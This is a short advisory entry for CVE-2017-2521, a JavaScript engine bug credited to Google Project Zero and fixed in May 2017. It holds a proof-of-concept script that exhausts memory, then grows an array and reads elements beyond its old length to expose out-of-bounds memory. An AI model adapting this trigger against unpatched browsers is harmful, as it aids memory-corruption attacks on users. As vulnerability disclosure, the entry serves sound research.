CVE-2017-2521.md

CVE-2017-2521

• Fix: May 2017
• Credit: lokihardt, Google Project Zero

PoC

const kArrayLength = 0x200000;

let arr = new Array(kArrayLength);
arr.fill({});

let exh = [];
try {
    for (;;) {
        exh.push(new ArrayBuffer(kArrayLength * 8 * 8));
    }
} catch (e) {
}

try {
    arr.length *= 8;
    print('failed');
} catch (e) {
    print(e);

    exh = null;

    print('arr length: ' + arr.length.toString(16));
    for (let i = kArrayLength, n = arr.length; i < n; i++) {
        if (arr[i])
            print(arr[i]);
    }
}

Reference

• Apple
• Google Project Zero